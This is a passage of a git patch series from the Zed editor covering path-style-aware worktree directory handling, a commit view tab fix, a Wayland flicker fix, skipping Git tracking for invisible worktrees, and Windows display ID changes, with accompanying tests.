Path::new(worktree_directory_setting).is_absolute() - || worktree_directory_setting.starts_with('/') + if path_style.is_absolute(worktree_directory_setting) || worktree_directory_setting.starts_with('\\') { anyhow::bail!( @@ -8169,12 +8179,19 @@ pub fn worktrees_directory_for_repo( anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); } - let joined = repository_anchor_path.join(trimmed); - let resolved = util::normalize_path(&joined); + let joined = path_style.join_path(repository_anchor_path, trimmed)?; + let resolved = if path_style.is_posix() { + joined + } else { + util::normalize_path(&joined) + }; let resolved = if resolved.starts_with(repository_anchor_path) { resolved - } else if let Some(repo_dir_name) = repository_anchor_path.file_name() { - resolved.join(repo_dir_name) + } else if let Some(repo_dir_name) = repository_anchor_path + .file_name() + .and_then(|name| name.to_str()) + { + path_style.join_path(&resolved, repo_dir_name)? } else { resolved }; @@ -8659,7 +8676,7 @@ mod tests { use rand::{SeedableRng, rngs::StdRng}; use serde_json::json; use settings::SettingsStore; - use std::path::Path; + use std::path::{Path, PathBuf}; fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { @@ -8668,6 +8685,22 @@ mod tests { }); } + #[test] + fn test_new_worktree_path_uses_posix_style_for_remote_paths() { + let work_dir = Path::new("/home/user/dev/lsp-tests"); + let directory = + worktrees_directory_for_repo(work_dir, "../worktrees", PathStyle::Posix).unwrap(); + let directory = PathStyle::Posix + .join_path(&directory, "nimble-sky") + .unwrap(); + let path = PathStyle::Posix.join_path(&directory, "lsp-tests").unwrap(); + + assert_eq!( + path, + PathBuf::from("/home/user/dev/worktrees/lsp-tests/nimble-sky/lsp-tests") + ); + } + fn verify_invariants(repository: &Repository) -> anyhow::Result<()> { match &repository.commit_data_handler { CommitDataHandlerState::Open(handler) => { diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 3f752a279f237c..05d3843f0187f5 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -1182,7 +1182,7 @@ mod git_worktrees { use serde_json::json; use settings::SettingsStore; use std::path::{Path, PathBuf}; - use util::path; + use util::{path, paths::PathStyle}; fn init_test(cx: &mut gpui::TestAppContext) { zlog::init_test(); @@ -1198,43 +1198,61 @@ mod git_worktrees { let work_dir = Path::new("/code/my-project"); // Valid: sibling - assert!(worktrees_directory_for_repo(work_dir, "../worktrees").is_ok()); + assert!(worktrees_directory_for_repo(work_dir, "../worktrees", PathStyle::Posix).is_ok()); // Valid: subdirectory - assert!(worktrees_directory_for_repo(work_dir, ".git/zed-worktrees").is_ok()); - assert!(worktrees_directory_for_repo(work_dir, "my-worktrees").is_ok()); + assert!( + worktrees_directory_for_repo(work_dir, ".git/zed-worktrees", PathStyle::Posix).is_ok() + ); + assert!(worktrees_directory_for_repo(work_dir, "my-worktrees", PathStyle::Posix).is_ok()); // Invalid: just ".." would resolve back to the working directory itself - let err = worktrees_directory_for_repo(work_dir, "..").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "..", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be \"..\"")); // Invalid: ".." with trailing separators - let err = worktrees_directory_for_repo(work_dir, "..\\").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "..\\", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be \"..\"")); - let err = worktrees_directory_for_repo(work_dir, "../").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "../", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be \"..\"")); // Invalid: empty string would resolve to the working directory itself - let err = worktrees_directory_for_repo(work_dir, "").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("must not be empty")); // Invalid: absolute path - let err = worktrees_directory_for_repo(work_dir, "/tmp/worktrees").unwrap_err(); + let err = + worktrees_directory_for_repo(work_dir, "/tmp/worktrees", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("relative path")); // Invalid: "/" is absolute on Unix - let err = worktrees_directory_for_repo(work_dir, "/").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "/", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("relative path")); // Invalid: "///" is absolute - let err = worktrees_directory_for_repo(work_dir, "///").unwrap_err(); + let err = worktrees_directory_for_repo(work_dir, "///", PathStyle::Posix).unwrap_err(); assert!(err.to_string().contains("relative path")); // Invalid: escapes too far up - let err = worktrees_directory_for_repo(work_dir, "../../other-project/wt").unwrap_err(); + let err = + worktrees_directory_for_repo(work_dir, "../../other-project/wt", PathStyle::Posix) + .unwrap_err(); assert!(err.to_string().contains("outside")); } + #[test] + fn test_worktree_directory_uses_remote_path_style() { + let work_dir = Path::new("/home/user/dev/lsp-tests"); + + let directory = + worktrees_directory_for_repo(work_dir, "../worktrees", PathStyle::Posix).unwrap(); + + assert_eq!( + directory, + PathBuf::from("/home/user/dev/worktrees/lsp-tests") + ); + } + #[gpui::test] async fn test_git_worktrees_list_and_create(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/util/src/paths.rs b/crates/util/src/paths.rs index 94877af090fb77..d0baca0f4765c7 100644 --- a/crates/util/src/paths.rs +++ b/crates/util/src/paths.rs @@ -416,6 +416,68 @@ impl PathStyle { } } + pub fn join_path( + self, + left: impl AsRef, + right: impl AsRef, + ) -> anyhow::Result { + let left = left + .as_ref() + .to_str() + .ok_or_else(|| anyhow::anyhow!("Path contains invalid UTF-8"))?; + let right = right.as_ref(); + let right_string = right + .to_str() + .ok_or_else(|| anyhow::anyhow!("Path contains invalid UTF-8"))?; + let joined = self + .join(left, right_string) + .ok_or_else(|| anyhow::anyhow!("Path must be relative: {right:?}"))?; + Ok(PathBuf::from(self.normalize(&joined))) + } + + pub fn normalize(self, path_like: &str) -> String { + match self { + PathStyle::Windows => crate::normalize_path(Path::new(path_like)) + .to_string_lossy() + .into_owned(), + PathStyle::Posix => { + let is_absolute = path_like.starts_with('/'); + let remainder = if is_absolute { + path_like.trim_start_matches('/') + } else { + path_like + }; + + let mut components = Vec::new(); + for component in remainder.split(self.separators_ch()) { + match component { + "" | "." => {} + ".." => { + if components + .last() + .is_some_and(|component| *component != "..") + { + components.pop(); + } else if !is_absolute { + components.push(component); + } + } + component => components.push(component), + } + } + + let normalized = components.join(self.primary_separator()); + if is_absolute && normalized.is_empty() { + "/".to_string() + } else if is_absolute { + format!("/{normalized}") + } else { + normalized + } + } + } + } + pub fn split(self, path_like: &str) -> (Option<&str>, &str) { let Some(pos) = path_like.rfind(self.primary_separator()) else { return (None, path_like); @@ -1566,6 +1628,34 @@ mod tests { use super::*; use util_macros::perf; + #[test] + fn test_join_path_uses_path_style_separator() { + let posix_path = PathStyle::Posix + .join_path(Path::new("/home/user/dev"), "worktrees") + .unwrap(); + let windows_path = PathStyle::Windows + .join_path(Path::new("C:\\Users\\user\\dev"), "worktrees") + .unwrap(); + + assert_eq!(posix_path, PathBuf::from("/home/user/dev/worktrees")); + assert_eq!( + windows_path.to_string_lossy(), + "C:\\Users\\user\\dev\\worktrees" + ); + } + + #[test] + fn test_normalize_uses_path_style_separator() { + assert_eq!( + PathStyle::Posix.normalize("/home/user/dev/../worktrees/./zed"), + "/home/user/worktrees/zed" + ); + assert_eq!( + PathStyle::Windows.normalize("C:\\Users\\user\\dev\\worktrees"), + "C:\\Users\\user\\dev\\worktrees" + ); + } + fn rel_path_entry(path: &'static str, is_file: bool) -> (&'static RelPath, bool) { (RelPath::unix(path).unwrap(), is_file) } From 3df3acba40301c0a3e77ad1460b5e870db123b18 Mon Sep 17 00:00:00 2001 From: Jake Norris Date: Tue, 5 May 2026 21:49:36 -0400 Subject: [PATCH 217/231] Fix git graph file diff view opening wrong file if a previous one is already open (#55595) Fixed the portion of the open() function of the CommitView struct that checked to see if the commit view was already open in a tab. Previously, it did not account for files being filtered, and called pane.activate_item() when it found a matching commit SHA open. Now, the pane item is deleted and replaced with the new CommitView, respecting the position of the tab. This allows for the filtered files to be updated and work according to the expectations laid out in the mentioned issue. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55446 Release Notes: - Fix git graph file diff view opening wrong file if a previous one is already open --------- Co-authored-by: Christopher Biscardi --- crates/git_ui/src/commit_view.rs | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/crates/git_ui/src/commit_view.rs b/crates/git_ui/src/commit_view.rs index 19dea7adafea3c..c39c175e32c09e 100644 --- a/crates/git_ui/src/commit_view.rs +++ b/crates/git_ui/src/commit_view.rs @@ -201,7 +201,21 @@ impl CommitView { .is_some_and(|view| view.read(cx).commit.sha == commit_sha) }); if let Some(ix) = ix { - pane.activate_item(ix, true, true, window, cx); + let existing = pane + .items() + .filter_map(|item| item.downcast::()) + .find(|view| view.read(cx).commit.sha == commit_sha) + .unwrap(); + + pane.remove_item(existing.item_id(), false, false, window, cx); + pane.add_item( + Box::new(commit_view), + true, + true, + Some(ix), + window, + cx, + ); } else { pane.add_item(Box::new(commit_view), true, true, None, window, cx); } From 99dba6458653eaf57a46436307b146a0f3ce1b6e Mon Sep 17 00:00:00 2001 From: b5l <35809732+b5l@users.noreply.github.com> Date: Wed, 6 May 2026 05:40:02 +0200 Subject: [PATCH 218/231] gpui_linux: Fix Wayland flickering under CPU load by skipping redundant surface commit (#54214) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #32792 Closes #38266 Closes #54133 Release Notes: - Fixed graphical corruption that could occur when using Wayland ---- **What**: Fixes flickering on Wayland (Sway/wlroots) under CPU load (e.g. rust-analyzer running). The bug only reproduces in release builds - debug builds are too slow to hit the race window. Environment where this was reproduced: Intel GPU (both Xe KMD and i915), Mesa 26.0.4, Sway 1.11. **Why**: When wgpu presents a frame on Wayland+Vulkan, it calls `vkQueuePresentKHR,` which - as required by the Vulkan spec - synchronously issues `wl_surface.attach`, `wl_surface.damage`, and `wl_surface.commit` to the compositor before returning. The commit also picks up any pending frame callbacks. Zed's `completed_frame()` independently calls `state.surface.commit()`. This is a redundant second commit on the same surface. Under load, the Wayland socket dispatch can be delayed enough that both commits are in flight in close succession, and the ordering becomes timing-dependent. When Zed's commit reaches the compositor before Mesa's attach+commit sequence has been fully flushed, the compositor sees a commit with no buffer attached, fires `wl_callback::Done` immediately, and Zed starts the next frame too early - Mesa's real buffer arrives late, causing the visible flicker. Under no load, Mesa's synchronous commit consistently reaches the compositor first, so the bug doesn't appear. **Fix**: Track whether `renderer.draw()` actually called `frame.present()`. When it did, Mesa owns the `wl_surface.commit()` for that frame - skip Zed's commit in `completed_frame()`. Only commit ourselves when wgpu didn't present (surface not configured, lost, occluded, etc.) - in those cases Mesa won't commit, and we need to keep the frame callback alive. --------- Co-authored-by: Benjamin Laib Co-authored-by: John Tur --- crates/gpui_linux/src/linux/wayland/window.rs | 15 ++++++++++++--- crates/gpui_wgpu/src/wgpu_renderer.rs | 18 +++++++++--------- 2 files changed, 21 insertions(+), 12 deletions(-) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 857289a1d9708a..37d0f492d25caf 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -117,6 +117,7 @@ pub struct WaylandWindowState { active: bool, hovered: bool, pub(crate) force_render_after_recovery: bool, + renderer_presented: bool, in_progress_configure: Option, resize_throttle: bool, in_progress_window_controls: Option, @@ -392,6 +393,7 @@ impl WaylandWindowState { active: false, hovered: false, force_render_after_recovery: false, + renderer_presented: false, in_progress_window_controls: None, window_controls: WindowControls::default(), client_inset: None, @@ -1398,7 +1400,7 @@ impl PlatformWindow for WaylandWindow { return; } - state.renderer.draw(scene); + state.renderer_presented = state.renderer.draw(scene); if state.renderer.needs_redraw() { state.force_render_after_recovery = true; @@ -1406,8 +1408,15 @@ impl PlatformWindow for WaylandWindow { } fn completed_frame(&self) { - let state = self.borrow(); - state.surface.commit(); + let mut state = self.borrow_mut(); + + // Work around a bug in old versions of wlroots where committing without a buffer attached + // can cause invalid synchronization that leads to graphical corruption. + if !state.renderer_presented { + state.surface.commit(); + } + + state.renderer_presented = false; } fn sprite_atlas(&self) -> Arc { diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index da7e71c726b791..08f30dc0090d3a 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -1079,13 +1079,13 @@ impl WgpuRenderer { self.max_texture_size } - pub fn draw(&mut self, scene: &Scene) { + pub fn draw(&mut self, scene: &Scene) -> bool { // Bail out early if the surface has been unconfigured (e.g. during // Android background/rotation transitions). Attempting to acquire // a texture from an unconfigured surface can block indefinitely on // some drivers (Adreno). if !self.surface_configured { - return; + return false; } let last_error = self.last_error.lock().unwrap().take(); @@ -1106,7 +1106,7 @@ impl WgpuRenderer { self.atlas.clear(); self.needs_redraw = true; self.failed_frame_count = 0; - return; + return false; } } else { self.failed_frame_count = 0; @@ -1124,7 +1124,7 @@ impl WgpuRenderer { resources .surface .configure(&resources.device, &surface_config); - return; + return false; } wgpu::CurrentSurfaceTexture::Lost | wgpu::CurrentSurfaceTexture::Outdated => { let surface_config = self.surface_config.clone(); @@ -1132,15 +1132,15 @@ impl WgpuRenderer { resources .surface .configure(&resources.device, &surface_config); - return; + return false; } wgpu::CurrentSurfaceTexture::Timeout | wgpu::CurrentSurfaceTexture::Occluded => { - return; + return false; } wgpu::CurrentSurfaceTexture::Validation => { *self.last_error.lock().unwrap() = Some("Surface texture validation error".to_string()); - return; + return false; } }; @@ -1321,7 +1321,7 @@ impl WgpuRenderer { self.instance_buffer_capacity ); frame.present(); - return; + return true; } self.grow_instance_buffer(); continue; @@ -1331,7 +1331,7 @@ impl WgpuRenderer { .queue .submit(std::iter::once(encoder.finish())); frame.present(); - return; + return true; } } From 0540e541835124ad8c169adc66c49540aa82b317 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Wed, 6 May 2026 08:57:06 +0200 Subject: [PATCH 219/231] Skip Git tracking for invisible worktrees (#55760) Release Notes: - N/A or Added/Fixed/Improved ... --- crates/project/src/git_store.rs | 7 -- crates/worktree/src/worktree.rs | 110 +++++++++++++--------- crates/worktree/tests/integration/main.rs | 44 +++++++++ 3 files changed, 109 insertions(+), 52 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index b39f24bb4ced02..509d694885b1ad 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -1495,13 +1495,6 @@ impl GitStore { else { return; }; - if !worktree.read(cx).is_visible() { - log::debug!( - "not adding repositories for local worktree {:?} because it's not visible", - worktree.read(cx).abs_path() - ); - return; - } self.update_repositories_from_worktree( *worktree_id, project_environment.clone(), diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 974219bf9bca4d..2b6129280986a2 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -414,9 +414,13 @@ impl Worktree { None }; - let root_repo_common_dir = discover_root_repo_common_dir(&abs_path, fs.as_ref()) - .await - .map(SanitizedPath::from_arc); + let root_repo_common_dir = if visible { + discover_root_repo_common_dir(&abs_path, fs.as_ref()) + .await + .map(SanitizedPath::from_arc) + } else { + None + }; Ok(cx.new(move |cx: &mut Context| { let mut snapshot = LocalSnapshot { @@ -1147,6 +1151,7 @@ impl LocalWorktree { let next_entry_id = self.next_entry_id.clone(); let fs = self.fs.clone(); let scanning_enabled = self.scanning_enabled; + let track_git_repositories = self.visible; let settings = self.settings.clone(); let (scan_states_tx, mut scan_states_rx) = mpsc::unbounded(); let background_scanner = cx.background_spawn({ @@ -1185,6 +1190,7 @@ impl LocalWorktree { share_private_files, settings, watcher, + track_git_repositories, is_single_file, }; @@ -3936,6 +3942,7 @@ struct BackgroundScanner { watcher: Arc, settings: WorktreeSettings, share_private_files: bool, + track_git_repositories: bool, /// Whether this is a single-file worktree (root is a file, not a directory). /// Used to determine if we should give up after repeated canonicalization failures. is_single_file: bool, @@ -3961,7 +3968,7 @@ impl BackgroundScanner { // If the worktree root does not contain a git repository, then find // the git repository in an ancestor directory. Find any gitignore files // in ancestor directories. - let repo = if scanning_enabled { + let repo = if scanning_enabled && self.track_git_repositories { let (ignores, exclude, repo) = discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await; let mut state = self.state.lock().await; @@ -3989,6 +3996,7 @@ impl BackgroundScanner { let containing_git_repository = if let Some((ancestor_dot_git, work_directory)) = repo && scanning_enabled + && self.track_git_repositories { maybe!(async { self.state @@ -4015,6 +4023,7 @@ impl BackgroundScanner { let mut global_gitignore_events = if let Some(global_gitignore_path) = &global_gitignore_file && scanning_enabled + && self.track_git_repositories { let is_file = self.fs.is_file(&global_gitignore_path).await; self.state.lock().await.snapshot.global_gitignore = if is_file { @@ -4352,14 +4361,16 @@ impl BackgroundScanner { let mut dot_git_paths = None; - for ancestor in abs_path.as_path().ancestors() { - if is_dot_git(ancestor, self.fs.as_ref()).await { - let path_in_git_dir = abs_path - .as_path() - .strip_prefix(ancestor) - .expect("stripping off the ancestor"); - dot_git_paths = Some((ancestor.to_owned(), path_in_git_dir.to_owned())); - break; + if self.track_git_repositories { + for ancestor in abs_path.as_path().ancestors() { + if is_dot_git(ancestor, self.fs.as_ref()).await { + let path_in_git_dir = abs_path + .as_path() + .strip_prefix(ancestor) + .expect("stripping off the ancestor"); + dot_git_paths = Some((ancestor.to_owned(), path_in_git_dir.to_owned())); + break; + } } } @@ -4384,9 +4395,10 @@ impl BackgroundScanner { } } - if abs_path - .as_path() - .ends_with(Path::new(DOT_GIT).join(REPO_EXCLUDE)) + if self.track_git_repositories + && abs_path + .as_path() + .ends_with(Path::new(DOT_GIT).join(REPO_EXCLUDE)) { if let Some(repository) = snapshot.git_repositories.values().find(|repo| { repo.common_dir_abs_path.join(REPO_EXCLUDE) == abs_path.as_path() @@ -4437,7 +4449,9 @@ impl BackgroundScanner { continue; }; - if abs_path.file_name() == Some(OsStr::new(GITIGNORE)) { + if self.track_git_repositories + && abs_path.file_name() == Some(OsStr::new(GITIGNORE)) + { for (_, repo) in snapshot .git_repositories .iter() @@ -4774,29 +4788,33 @@ impl BackgroundScanner { continue; }; - if child_name == DOT_GIT { - let mut state = self.state.lock().await; - state - .insert_git_repository( - child_path.clone(), - self.fs.as_ref(), - self.watcher.as_ref(), - ) - .await; - } else if child_name == GITIGNORE { - match build_gitignore(&child_abs_path, self.fs.as_ref()).await { - Ok(ignore) => { - let ignore = Arc::new(ignore); - ignore_stack = ignore_stack - .append(IgnoreKind::Gitignore(job.abs_path.clone()), ignore.clone()); - new_ignore = Some(ignore); - } - Err(error) => { - log::error!( - "error loading .gitignore file {:?} - {:?}", - child_name, - error - ); + if self.track_git_repositories { + if child_name == DOT_GIT { + let mut state = self.state.lock().await; + state + .insert_git_repository( + child_path.clone(), + self.fs.as_ref(), + self.watcher.as_ref(), + ) + .await; + } else if child_name == GITIGNORE { + match build_gitignore(&child_abs_path, self.fs.as_ref()).await { + Ok(ignore) => { + let ignore = Arc::new(ignore); + ignore_stack = ignore_stack.append( + IgnoreKind::Gitignore(job.abs_path.clone()), + ignore.clone(), + ); + new_ignore = Some(ignore); + } + Err(error) => { + log::error!( + "error loading .gitignore file {:?} - {:?}", + child_name, + error + ); + } } } } @@ -5004,11 +5022,12 @@ impl BackgroundScanner { ) .await; - let mut new_ancestor_repo = if relative_paths.iter().any(|path| path.is_empty()) { - Some(discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await) - } else { - None - }; + let mut new_ancestor_repo = + if self.track_git_repositories && relative_paths.iter().any(|path| path.is_empty()) { + Some(discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await) + } else { + None + }; let mut state = self.state.lock().await; let doing_recursive_update = scan_queue_tx.is_some(); @@ -5054,7 +5073,8 @@ impl BackgroundScanner { if let (Some(scan_queue_tx), true) = (&scan_queue_tx, is_dir) { if state.should_scan_directory(&fs_entry) - || (fs_entry.path.is_empty() + || (self.track_git_repositories + && fs_entry.path.is_empty() && abs_path.file_name() == Some(OsStr::new(DOT_GIT))) { state diff --git a/crates/worktree/tests/integration/main.rs b/crates/worktree/tests/integration/main.rs index 87eb0fe3081bd2..4fa1fa9a1e4ca7 100644 --- a/crates/worktree/tests/integration/main.rs +++ b/crates/worktree/tests/integration/main.rs @@ -3283,6 +3283,50 @@ async fn test_root_repo_common_dir(executor: BackgroundExecutor, cx: &mut TestAp ); } +#[gpui::test] +async fn test_invisible_worktree_does_not_track_ancestor_git_repository( + executor: BackgroundExecutor, + cx: &mut TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(executor); + fs.insert_tree( + path!("/repo"), + json!({ + ".git": {}, + "project": { + "file.txt": "content", + }, + }), + ) + .await; + + let worktree = Worktree::local( + path!("/repo/project").as_ref(), + false, + fs.clone(), + Arc::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + worktree + .update(cx, |worktree, _| { + worktree.as_local().unwrap().scan_complete() + }) + .await; + cx.run_until_parked(); + + worktree.read_with(cx, |worktree, _| { + let local_worktree = worktree.as_local().unwrap(); + assert!(local_worktree.repositories().is_empty()); + assert_eq!(local_worktree.root_repo_common_dir(), None); + }); +} + #[gpui::test] async fn test_linked_worktree_git_file_event_does_not_panic( executor: BackgroundExecutor, From f6572454c18b080fc91d049a512c3fd78edaf281 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Wed, 6 May 2026 09:35:40 +0200 Subject: [PATCH 220/231] gpui(windows): Fix unwrap panic when monitor goes missing (#55630) Fixes ZED-5K1 Release Notes: - Fixed a panic on windows when a monitor disappears from windows monitor enumeration --------- Co-authored-by: John Tur --- crates/gpui/src/platform.rs | 10 +- crates/gpui_linux/src/linux/wayland/client.rs | 6 +- .../gpui_linux/src/linux/wayland/display.rs | 2 +- crates/gpui_linux/src/linux/x11/client.rs | 2 +- crates/gpui_linux/src/linux/x11/display.rs | 2 +- crates/gpui_linux/src/linux/x11/window.rs | 4 +- crates/gpui_macos/src/display.rs | 2 +- crates/gpui_windows/src/display.rs | 106 +++--------------- crates/gpui_windows/src/events.rs | 8 +- crates/gpui_windows/src/window.rs | 9 +- 10 files changed, 36 insertions(+), 115 deletions(-) diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index a00d158bc51704..00cd9d13a4700b 100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -326,22 +326,22 @@ pub struct ScreenCaptureFrame(pub PlatformScreenCaptureFrame); /// An opaque identifier for a hardware display #[derive(PartialEq, Eq, Hash, Copy, Clone)] -pub struct DisplayId(pub(crate) u32); +pub struct DisplayId(pub(crate) u64); impl DisplayId { /// Create a new `DisplayId` from a raw platform display identifier. - pub fn new(id: u32) -> Self { + pub fn new(id: u64) -> Self { Self(id) } } -impl From for DisplayId { - fn from(id: u32) -> Self { +impl From for DisplayId { + fn from(id: u64) -> Self { Self(id) } } -impl From for u32 { +impl From for u64 { fn from(id: DisplayId) -> Self { id.0 } diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index 5edd9477b33878..00b0508e19c83a 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -768,7 +768,7 @@ impl LinuxClient for WaylandClient { .outputs .iter() .find_map(|(object_id, output)| { - (object_id.protocol_id() == u32::from(id)).then(|| { + (object_id.protocol_id() as u64 == u64::from(id)).then(|| { Rc::new(WaylandDisplay { id: object_id.clone(), name: output.name.clone(), @@ -810,11 +810,11 @@ impl LinuxClient for WaylandClient { let parent = state.keyboard_focused_window.clone(); let target_output = params.display_id.and_then(|display_id| { - let target_protocol_id: u32 = display_id.into(); + let target_protocol_id: u64 = display_id.into(); state .wl_outputs .iter() - .find(|(id, _)| id.protocol_id() == target_protocol_id) + .find(|(id, _)| id.protocol_id() as u64 == target_protocol_id) .map(|(_, output)| output.clone()) }); diff --git a/crates/gpui_linux/src/linux/wayland/display.rs b/crates/gpui_linux/src/linux/wayland/display.rs index 874cae878381cf..8fa9122d6296b3 100644 --- a/crates/gpui_linux/src/linux/wayland/display.rs +++ b/crates/gpui_linux/src/linux/wayland/display.rs @@ -25,7 +25,7 @@ impl Hash for WaylandDisplay { impl PlatformDisplay for WaylandDisplay { fn id(&self) -> DisplayId { - DisplayId::new(self.id.protocol_id()) + DisplayId::new(self.id.protocol_id() as u64) } fn uuid(&self) -> anyhow::Result { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index bedd3c3e2973e0..1e573a54bf5e36 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ b/crates/gpui_linux/src/linux/x11/client.rs @@ -1567,7 +1567,7 @@ impl LinuxClient for X11Client { X11Display::new( &state.xcb_connection, state.scale_factor, - u32::from(id) as usize, + u64::from(id) as usize, ) .ok()?, )) diff --git a/crates/gpui_linux/src/linux/x11/display.rs b/crates/gpui_linux/src/linux/x11/display.rs index 900c55e759ac86..582d76f7f60272 100644 --- a/crates/gpui_linux/src/linux/x11/display.rs +++ b/crates/gpui_linux/src/linux/x11/display.rs @@ -38,7 +38,7 @@ impl X11Display { impl PlatformDisplay for X11Display { fn id(&self) -> DisplayId { - DisplayId::new(self.x_screen_index as u32) + DisplayId::new(self.x_screen_index as u64) } fn uuid(&self) -> anyhow::Result { diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index 325d70eb311743..0e402a7d63b26f 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -343,7 +343,7 @@ impl rwh::HasDisplayHandle for X11Window { }; let screen_id = { let state = self.0.state.borrow(); - u32::from(state.display.id()) as i32 + u64::from(state.display.id()) as i32 }; let handle = rwh::XcbDisplayHandle::new(Some(non_zero), screen_id); Ok(unsafe { rwh::DisplayHandle::borrow_raw(handle.into()) }) @@ -429,7 +429,7 @@ impl X11WindowState { ) -> anyhow::Result { let x_screen_index = params .display_id - .map_or(x_main_screen_index, |did| u32::from(did) as usize); + .map_or(x_main_screen_index, |did| u64::from(did) as usize); let visual_set = find_visuals(xcb, x_screen_index); diff --git a/crates/gpui_macos/src/display.rs b/crates/gpui_macos/src/display.rs index b9338bff84621e..8e5db589359966 100644 --- a/crates/gpui_macos/src/display.rs +++ b/crates/gpui_macos/src/display.rs @@ -73,7 +73,7 @@ unsafe extern "C" { impl PlatformDisplay for MacDisplay { fn id(&self) -> DisplayId { - DisplayId::new(self.0) + DisplayId::new(self.0 as u64) } fn uuid(&self) -> Result { diff --git a/crates/gpui_windows/src/display.rs b/crates/gpui_windows/src/display.rs index 1931a6949fdf64..3b81dc63a004a2 100644 --- a/crates/gpui_windows/src/display.rs +++ b/crates/gpui_windows/src/display.rs @@ -35,21 +35,19 @@ unsafe impl Sync for WindowsDisplay {} impl WindowsDisplay { pub(crate) fn new(display_id: DisplayId) -> Option { - let screen = available_monitors() - .into_iter() - .nth(u32::from(display_id) as _)?; - let info = get_monitor_info(screen).log_err()?; + let handle = HMONITOR(u64::from(display_id) as _); + let info = get_monitor_info(handle).log_err()?; let monitor_size = info.monitorInfo.rcMonitor; let work_area = info.monitorInfo.rcWork; let uuid = generate_uuid(&info.szDevice); - let scale_factor = get_scale_factor_for_monitor(screen).log_err()?; + let scale_factor = get_scale_factor_for_monitor(handle).log_err()?; let physical_size = size( (monitor_size.right - monitor_size.left).into(), (monitor_size.bottom - monitor_size.top).into(), ); Some(WindowsDisplay { - handle: screen, + handle, display_id, scale_factor, bounds: Bounds { @@ -76,86 +74,8 @@ impl WindowsDisplay { }) } - pub fn new_with_handle(monitor: HMONITOR) -> anyhow::Result { - let info = get_monitor_info(monitor)?; - let monitor_size = info.monitorInfo.rcMonitor; - let work_area = info.monitorInfo.rcWork; - let uuid = generate_uuid(&info.szDevice); - let display_id = available_monitors() - .iter() - .position(|handle| handle.0 == monitor.0) - .unwrap(); - let scale_factor = get_scale_factor_for_monitor(monitor)?; - let physical_size = size( - (monitor_size.right - monitor_size.left).into(), - (monitor_size.bottom - monitor_size.top).into(), - ); - - Ok(WindowsDisplay { - handle: monitor, - display_id: DisplayId::new(display_id as _), - scale_factor, - bounds: Bounds { - origin: logical_point( - monitor_size.left as f32, - monitor_size.top as f32, - scale_factor, - ), - size: physical_size.to_pixels(scale_factor), - }, - visible_bounds: Bounds { - origin: logical_point(work_area.left as f32, work_area.top as f32, scale_factor), - size: size( - (work_area.right - work_area.left) as f32 / scale_factor, - (work_area.bottom - work_area.top) as f32 / scale_factor, - ) - .map(gpui::px), - }, - physical_bounds: Bounds { - origin: point(monitor_size.left.into(), monitor_size.top.into()), - size: physical_size, - }, - uuid, - }) - } - - fn new_with_handle_and_id(handle: HMONITOR, display_id: DisplayId) -> anyhow::Result { - let info = get_monitor_info(handle)?; - let monitor_size = info.monitorInfo.rcMonitor; - let work_area = info.monitorInfo.rcWork; - let uuid 